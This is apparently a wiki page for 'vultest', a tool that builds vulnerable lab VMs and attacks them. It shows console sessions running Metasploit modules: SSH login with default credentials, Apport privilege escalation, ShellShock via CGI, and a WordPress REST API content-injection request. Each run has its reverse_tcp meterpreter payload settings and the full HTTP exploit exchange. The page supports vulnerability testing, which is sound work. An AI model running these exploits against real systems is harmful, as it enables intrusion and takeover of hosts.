Using vultest
redsloop edited this page Aug 6, 2020 · 41 revisions
There are two modes of execution: batch and interactive. The vulnerable environment used in the examples below has the following settings:
- username: vagrant
- password: vagrant
- IP address: 192.168.177.177
❯ ./vultest --CVE CVE-2015-1318 --dir /Users/redsloop/SimpleVulenv --destroy yes
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
++++++++++++++++++++ Vulenv Part ++++++++++++++++++++
Vulnerability environment list
+--+-------------+
|id|vulenv name |
+--+-------------+
|1 |CVE-2015-1318|
+--+-------------+
Select an id for testing vulnerability envrionment? CVE-2015-1318
Do you select a vagrant image in local? no
Do you select a vagrant image in Vagrant Cloud? no
[+] Startup
++++++++++++++++++++ Attack Part ++++++++++++++++++++
[*] Prepare for an attack envionment
If you start the attack, puress ENTER key
[*] Exploit attack
[+] auxiliary/scanner/ssh/ssh_login
[+] exploit/linux/local/apport_abrt_chroot_priv_esc
Result: Attack Succeed(See Report)
[*] Brake into target machine
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:3e:b7:7c
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.2.15
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe3e:b77c
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : eth1
Hardware MAC : 08:00:27:37:48:12
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.177.177
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe37:4812
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > exit
++++++++++++++++++++ Report Part ++++++++++++++++++++
Vultest Report
Vulnerable Environment
Vulnerable Software
● OS Name: ubuntu
● OS Version: 14.04.1
● Kernel Version: 3.13.0-32-generic
IP Infomation
Interface: lo
● IPv4: 127.0.0.1/8
● IPv6: ::1/128
Interface: eth0
● IPv4: 10.0.2.15/24
● IPv6: fe80::a00:27ff:fe3e:b77c/64
Interface: eth1
● IPv4: 192.168.177.177/24
● IPv6: fe80::a00:27ff:fe37:4812/64
Port
● 68/tcp(bootpc)
● 24409/tcp
● 56837/tcp
● 52777/tcp
● 5432/tcp(postgresql)
● 55553/tcp
● 22/tcp(ssh)
● 51619/tcp
Services
● acpid
● apparmor
● atd
● cron
● friendly-recovery
● postgresql
● resolvconf
● rsyslog
● udev
● vboxadd
● vboxadd-service
Attack Method
Metasploit
Module Name: auxiliary/scanner/ssh/ssh_login
● RHOSTS : 192.168.177.177
● USERNAME : vagrant
● PASSWORD : vagrant
Module Name: exploit/linux/local/apport_abrt_chroot_priv_esc
● SESSION : 1
● PAYLOAD : linux/x64/meterpreter/reverse_tcp
● LHOST : 192.168.177.177
Vulnerability
CVE Description
┃ The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges
┃ via a crafted usr/share/apport/apport file in a namespace (container).
Affect Software Version(CPE)
● cpe:2.3:a:apport_project:apport:2.13:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.13.1:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.13.2:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.13.3:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.1:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.2:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.3:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.4:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.5:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.6:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.7:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.15:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.15.1:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.16:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.16.1:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.16.2:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.17:*:*:*:*:*:*:*
++++++++++++++++++++ Destroy Part ++++++++++++++++++++
Please select the environment you want to delete vulenv
[*] Destroy test_dir(/Users/redsloop/SimpleVulenv)
[+] Destroy the environment
❯ ./vultest --cve CVE-2014-6271 --dir $HOME/VultestEnv --attack_dir $HOME/VultestAttack --destroy yes
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
++++++++++++++++++++ Vulenv Part ++++++++++++++++++++
Vulnerability environment list
+--+---------------------------------+
|id|vulenv name |
+--+---------------------------------+
|1 |ShellShock(meterpreter) |
|2 |ShellShock(shell) |
|3 |CVE-2014-6271(yum install httpd) |
|4 |CVE-2014-6271(yum install latest)|
+--+---------------------------------+
Select an id for testing vulnerability envrionment? CVE-2014-6271(yum install latest)
Do you select a vagrant image in local? no
Do you select a vagrant image in Vagrant Cloud? no
[+] Startup
[+] Reload
++++++++++++++++++++ Attack Part ++++++++++++++++++++
[*] Prepare for an attack envionment
[+] Startup
If you start the attack, puress ENTER key
[*] Exploit attack
[+] exploit/multi/http/apache_mod_cgi_bash_env_exec
Result: Attack Succeed(See Report)
[*] Brake into target machine
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 16436
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:10:fe:e8
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.2.15
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe10:fee8
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : eth1
Hardware MAC : 08:00:27:77:a2:3c
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.177.177
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe77:a23c
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > exit
++++++++++++++++++++ Report Part ++++++++++++++++++++
Vultest Report
Vulnerable Environment
Vulnerable Software
Operating System
● Name: centos
● Version: 6.5
● Kernel Version: 2.6.32-431.el6.x86_64
Related Software
● gcc : 4.4.7-23.el6
● make : 1:3.81-23.el6
● pcre : 7.8-6.el6
● wget : 1.12-10.el6
● httpd : 2.2.15-69.el6.centos
IP Infomation
Interface: lo
● IPv4: 127.0.0.1/8
● IPv6: ::1/128
Interface: eth0
● IPv4: 10.0.2.15/24
● IPv6: fe80::a00:27ff:fe10:fee8/64
Interface: eth1
● IPv4: 192.168.177.177/24
● IPv6: fe80::a00:27ff:fe77:a23c/64
Port
● 59018/udp
● 68/udp(bootpc)
● 80/tcp(http)
● 22/tcp(ssh)
● 25/tcp(smtp)
Services
● auditd
● crond
● master
● rsyslogd
● openssh-daemon
Attack Method
Metasploit
Module Name: exploit/multi/http/apache_mod_cgi_bash_env_exec
● RHOST : 192.168.177.177
● TARGETURI : http://192.168.177.177/cgi-bin/test.cgi
● PAYLOAD : linux/x86/meterpreter/reverse_tcp
Vulnerability
CVE Description
┃ GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment
┃ variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated
┃ by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the
┃ Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting
┃ the environment occurs across a privilege boundary from Bash execution, aka
┃ "ShellShock." NOTE: the original
┃ fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is
┃ still present after the incorrect fix.
Affect Software Version(CPE)
● cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*
++++++++++++++++++++ Destroy Part ++++++++++++++++++++
Please select the environment you want to delete vulenv
[*] Destroy test_dir(/Users/redsloop/VultestEnv)
[+] Destroy the environment
❯ ./vultest --cve CVE-2017-5487 --dir $HOME/VultestEnv --destroy yes
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
++++++++++++++++++++ Vulenv Part ++++++++++++++++++++
Vulnerability environment list
+--+-------------+
|id|vulenv name |
+--+-------------+
|1 |Wordpress 4.7|
+--+-------------+
Select an id for testing vulnerability envrionment? Wordpress 4.7
Do you select a vagrant image in local? no
Do you select a vagrant image in Vagrant Cloud? no
[+] Startup
++++++++++++++++++++ Attack Part ++++++++++++++++++++
[*] Prepare for an attack envionment
If you start the attack, puress ENTER key
[*] Exploit attack
Result: Cannot Make a Decision(See Report)
++++++++++++++++++++ Report Part ++++++++++++++++++++
Vultest Report
Vulnerable Environment
Vulnerable Software
Operating System
● Name: centos
● Version: 7.5
● Kernel Version: 3.10.0-862.el7.x86_64
Related Software
● gcc : 4.8.5-39.el7
● apr : 1.7.0
● expat-devel : 2.1.0-11.el7
● apr-util : 1.6.1
● gcc-c++ : 4.8.5-39.el7
● perl : 4:5.16.3-294.el7_6
● pcre : 8.39
● httpd : 2.4.43
● mysql : 5.7.15
● libxml2-devel : 2.9.1-6.el7.4
● libpng-devel : 2:1.5.13-7.el7_2
● unzip : 6.0-21.el7
● php : 7.1.0
● wp-cli : 0.24.1
IP Infomation
Interface: lo
● IPv4: 127.0.0.1/8
● IPv6: ::1/128
Interface: enp0s3
● IPv4: 10.0.2.15/24
● IPv6: fe80::a00:27ff:fe03:8672/64
Interface: enp0s8
● IPv4: 192.168.177.177/24
● IPv6: fe80::a00:27ff:feda:ee0/64
Port
● 323/udp
● 50122/udp
● 68/udp(bootpc)
● 22/tcp(ssh)
● 60672/tcp
● 60678/tcp
● 3306/tcp(mysql)
● 80/tcp(http)
Attack Method
HTTP
Target URL
http://192.168.177.177/wordpress/index.php/hello-world/
HTTP Details
Attack URL
http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1/?id=1AAA
HTTP Method
post
Request
Header
accept-encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
accept: /, application/json
user-agent: Ruby
content-type: application/x-www-form-urlencoded
connection: close
host: 192.168.177.177
content-length: 79
Body
title=Hello+World+CVE-2017-5487&content=Vulnrerability+in+Wordpress+version+4.1
Response
Header
date: Thu, 06 Aug 2020 14:00:51 GMT
server: Apache/2.4.43 (Unix) PHP/7.1.0
x-powered-by: PHP/7.1.0
x-robots-tag: noindex
link: http://192.168.177.177/wordpress/index.php/wp-json/; rel="https://api.w.org/"
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages
access-control-allow-headers: Authorization, Content-Type
allow: POST, PUT, PATCH, DELETE
content-length: 2007
connection: close
content-type: application/json; charset=UTF-8
Body(JSON)
{
  "id": 1,
  "date": "2020-08-06T13:59:58",
  "date_gmt": "2020-08-06T13:59:58",
  "guid": {
    "rendered": "http://192.168.177.177/wordpress/?p=1",
    "raw": "http://192.168.177.177/wordpress/?p=1"
  },
  "modified": "2020-08-06T14:00:51",
  "modified_gmt": "2020-08-06T14:00:51",
  "password": "",
  "slug": "hello-world",
  "status": "publish",
  "type": "post",
  "link": "http://192.168.177.177/wordpress/index.php/2020/08/06/hello-world/",
  "title": {
    "raw": "Hello World CVE-2017-5487",
    "rendered": "Hello World CVE-2017-5487"
  },
  "content": {
    "raw": "Vulnrerability in Wordpress version 4.1",
    "rendered": "<p>Vulnrerability in WordPress version 4.1</p>\n",
    "protected": false
  },
  "excerpt": {
    "raw": "",
    "rendered": "<p>Vulnrerability in WordPress version 4.1</p>\n",
    "protected": false
  },
  "author": 1,
  "featured_media": 0,
  "comment_status": "open",
  "ping_status": "open",
  "sticky": false,
  "template": "",
  "format": "standard",
  "meta": [],
  "categories": [
    1
  ],
  "tags": [],
  "_links": {
    "self": [
      {
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1"
      }
    ],
    "collection": [
      {
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts"
      }
    ],
    "about": [
      {
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/types/post"
      }
    ],
    "author": [
      {
        "embeddable": true,
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/users/1"
      }
    ],
    "replies": [
      {
        "embeddable": true,
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/comments?post=1"
      }
    ],
    "version-history": [
      {
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1/revisions"
      }
    ],
    "wp:attachment": [
      {
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/media?parent=1"
      }
    ],
    "wp:term": [
      {
        "taxonomy": "category",
        "embeddable": true,
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/categories?post=1"
      },
      {
        "taxonomy": "post_tag",
        "embeddable": true,
        "href": "http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/tags?post=1"
      }
    ],
    "curies": [
      {
        "name": "wp",
        "href": "https://api.w.org/{rel}",
        "templated": true
      }
    ]
  }
}
Vulnerability
CVE Description
┃ wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress
┃ 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to
┃ obtain sensitive information via a wp-json/wp/v2/users request.
Affect Software Version(CPE)
● cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
++++++++++++++++++++ Destroy Part ++++++++++++++++++++
Please select the environment you want to delete vulenv
[*] Destroy test_dir(/Users/redsloop/VultestEnv)
[+] Destroy the environment
❯ ./vultest
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
vultest >
❯ ./vultest
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
vultest > set TESTDIR $HOME/ShellShockVulenv
[*] testdir => $HOME/ShellShockVulenv
vultest > set ATTACKDIR $HOME/AttackEnv
[*] attackdir => $HOME/AttackEnv
vultest > test CVE-2014-6271
Vulnerability environment list
+--+---------------------------------+
|id|vulenv name |
+--+---------------------------------+
|1 |ShellShock(meterpreter) |
|2 |ShellShock(shell) |
|3 |CVE-2014-6271(yum install httpd) |
|4 |CVE-2014-6271(yum install latest)|
+--+---------------------------------+
Select an id for testing vulnerability envrionment? CVE-2014-6271(yum install httpd)
Do you select a vagrant image in local? no
Do you select a vagrant image in Vagrant Cloud? no
[+] Startup
[+] Reload
CVE-2014-6271 > exploit
Create an attack machine? Yes
[*] ATTACKHOST => 192.168.77.77
[*] ATTACKUSER => vagrant
[*] ATTACKPASSWD => vagrant
[*] Prepare for an attack envionment
[+] Startup
If you start the attack, puress ENTER key
[*] Exploit attack
[+] exploit/multi/http/apache_mod_cgi_bash_env_exec
Result: Attack Succeed(See Report)
[*] Brake into target machine
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 16436
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:10:fe:e8
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.2.15
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe10:fee8
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : eth1
Hardware MAC : 08:00:27:cd:60:8d
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.177.177
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fecd:608d
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > exit
❯ ./vultest
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
vultest > set TESTDIR $HOME/LocalVulenv
[*] testdir => $HOME/LocalVulenv
vultest > test CVE-2015-1318
Vulnerability environment list
+--+-------------+
|id|vulenv name |
+--+-------------+
|1 |CVE-2015-1318|
+--+-------------+
Select an id for testing vulnerability envrionment? CVE-2015-1318
Do you select a vagrant image in local? no
Do you select a vagrant image in Vagrant Cloud? no
[+] Startup
CVE-2015-1318 > exploit
[*] ATTACKHOST => 192.168.177.177
[*] Prepare for an attack envionment
If you start the attack, puress ENTER key
[*] Exploit attack
[+] auxiliary/scanner/ssh/ssh_login
[+] exploit/linux/local/apport_abrt_chroot_priv_esc
Result: Attack Succeed(See Report)
[*] Brake into target machine
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:3e:b7:7c
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.2.15
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe3e:b77c
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : eth1
Hardware MAC : 08:00:27:38:68:cb
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.177.177
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe38:68cb
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > exit
CVE-2014-6271 > report
Vultest Report
Target Host
Vulnerable Software
● bash : 4.3.20
Operating System
● Name: centos
● Version: 6.5
● Kernel Version: 2.6.32-431.el6.x86_64
Related Software
● gcc : 4.4.7-23.el6
● make : 3.81-23.el6
● pcre : 7.8-6.el6
● wget : 1.12-10.el6
● apache-httpd : 2.2.15
IP Infomation
Interface: lo
● IPv4: 127.0.0.1/8
● IPv6: ::1/128
Interface: eth0
● IPv4: 10.0.2.15/24
● IPv6: fe80::a00:27ff:fe10:fee8/64
Interface: eth1
● IPv4: 192.168.177.177/24
● IPv6: fe80::a00:27ff:fea1:ea48/64
Port
● 68/udp(bootpc)
● 80/tcp(http)
● 22/tcp(ssh)
● 25/tcp(smtp)
Services
● auditd
● crond
● master
● rsyslogd
● openssh-daemon
Attack Method
Module Name : exploit/multi/http/apache_mod_cgi_bash_env_exec
● RHOST : 192.168.177.177
● TARGETURI : http://192.168.177.177/cgi-bin/test.cgi
● PAYLOAD : linux/x86/meterpreter/reverse_tcp
Vulnerability
CVE Description
┃ GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment
┃ variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated
┃ by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the
┃ Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting
┃ the environment occurs across a privilege boundary from Bash execution, aka
┃ "ShellShock." NOTE: the original
┃ fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is
┃ still present after the incorrect fix.
Affect Software Version (CPE)
● cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*
CVE-2017-5487 > report
Vultest Report
Vulnerable Environment
Vulnerable Software
Operating System
● Name: centos
● Version: 7.5
● Kernel Version: 3.10.0-862.el7.x86_64
Related Software
● gcc : 4.8.5-39.el7
● apr : 1.7.0
● expat-devel : 2.1.0-11.el7
● apr-util : 1.6.1
● gcc-c++ : 4.8.5-39.el7
● perl : 4:5.16.3-294.el7_6
● pcre : 8.39
● httpd : 2.4.43
● mysql : 5.7.15
● libxml2-devel : 2.9.1-6.el7.4
● libpng-devel : 2:1.5.13-7.el7_2
● unzip : 6.0-21.el7
● php : 7.1.0
● wp-cli : 0.24.1
IP Infomation
Interface: lo
● IPv4: 127.0.0.1/8
● IPv6: ::1/128
Interface: enp0s3
● IPv4: 10.0.2.15/24
● IPv6: fe80::a00:27ff:fe03:8672/64
Interface: enp0s8
● IPv4: 192.168.177.177/24
● IPv6: fe80::a00:27ff:feda:ee0/64
Port
● 323/udp
● 50122/udp
● 68/udp(bootpc)
● 22/tcp(ssh)
● 60672/tcp
● 60678/tcp
● 3306/tcp(mysql)
● 80/tcp(http)
Attack Method
HTTP
Target URL
http://192.168.177.177/wordpress/index.php/hello-world/
HTTP Details
Attack URL
http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1/?id=1AAA
HTTP Method
post
Request
Header
accept-encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
accept: /, application/json
user-agent: Ruby
content-type: application/x-www-form-urlencoded
connection: close
host: 192.168.177.177
content-length: 79
Body
title=Hello+World+CVE-2017-5487&content=Vulnrerability+in+Wordpress+version+4.1
Response
Header
date: Thu, 06 Aug 2020 14:00:51 GMT
server: Apache/2.4.43 (Unix) PHP/7.1.0
x-powered-by: PHP/7.1.0
x-robots-tag: noindex
link: http://192.168.177.177/wordpress/index.php/wp-json/; rel="https://api.w.org/"
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages
access-control-allow-headers: Authorization, Content-Type
allow: POST, PUT, PATCH, DELETE
content-length: 2007
connection: close
content-type: application/json; charset=UTF-8
Body(JSON)
{
  "id": 1,
  "date": "2020-08-06T13:59:58",
  "date_gmt": "2020-08-06T13:59:58",
  "guid": {
    "rendered": "http://192.168.177.177/wordpress/?p=1",
    "raw": "http://192.168.177.177/wordpress/?p=1"
  },
  "modified": "2020-08-06T14:00:51",
  "modified_gmt": "2020-08-06T14:00:51",
  "password": "",
  "slug": "hello-world",
  "status": "publish",
  "type": "post",
